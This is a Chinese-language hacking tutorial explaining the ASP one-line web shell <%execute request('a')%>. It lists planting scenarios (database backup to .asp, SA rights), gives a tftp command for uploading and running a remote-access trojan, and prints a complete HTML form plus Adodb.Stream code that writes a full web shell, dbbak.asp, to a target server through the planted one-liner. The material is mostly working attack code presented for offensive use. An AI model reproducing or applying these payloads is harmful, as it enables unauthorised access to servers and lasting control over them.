asp一句话木马原理分析通过协议来访问一句话木马的使用范围(我只列举了2种):1)只有数据库备份的情况数据库备份成asp文件时候，不出现“编译错误，缺少脚本关闭标志%》”2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快)tftp-iipgetserver.exe一句话木马《%executerequest(“a”)%》的原理:首先知道execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马交由asp.dll解析.上面的代码《%executerequest(“a”)%》可以这样来解释：《%ifrequest(“a”)《》”“thenexecuterequest(“a”)%》如果a不为空的时候执行.执行什么呢?...ifa!=0下面我们来看一下客户端:《formaction=192.168.0.28/shell.aspmethod=post》《textareaname=lcols=120rows=10width=45》setlP=server.CreateObject(“Adodb.Stream”)‘创建Adodb.Stream组件..lP.OpenlP.Type=2lP.CharSet=“gb2312”lP.writetextrequest(“p”)lP.SaveToFileserver.mappath(“dbbak.asp”),2lP.ClosesetlP=nothingresponse.redirect“dbbak.asp”《/textarea》《textareaname=pcols=120rows=10width=45》要提交的数据《/textarea》《BR》《center》《br》《inputtype=submitvalue=提交》Adodb.Stream负责上传读取数据到服务器:组件：”Adodb.Stream”有下列方法：Cancel方法使用方法如下Object.Cancel说明：取消执行挂起的异步Execute或Open方法的调用。WriteText方法使用方法如下：Object.Write(Data,[Options])说明：将指定的文本数据装入对像中。参数说明：Data为指定的要写入的内容。Options写入的选项，可不指定，可选参数如下：adWriteChar=0adWriteLine=1SaveToFile方法使用方法如下：Object.SaveToFile(FileName,[Options])说明：将对像的内容写到FileName指定的文件中也就是我们保存木马的文件名dbbak.asp参数说明：FileName指定的文件Options存取的选项，可不指定，可选参数如下：adSaveCreateNotExist=1adSaveCreateOverWrite=2提交一句话木马后，a的值为空等待一个写入的值访问ww***/**.asp就是等待的过程如何准备用execute()这个函数来执行...创建一个Adodb.Stream，负责把我们的大马写入到服务器当中...同时，这个组件定义的变量SaveToFile定义了我们大马的名字..dbbak.asp提交到服务器后execute()函数检测到a的值不为空了，所以就执行了我们的大马！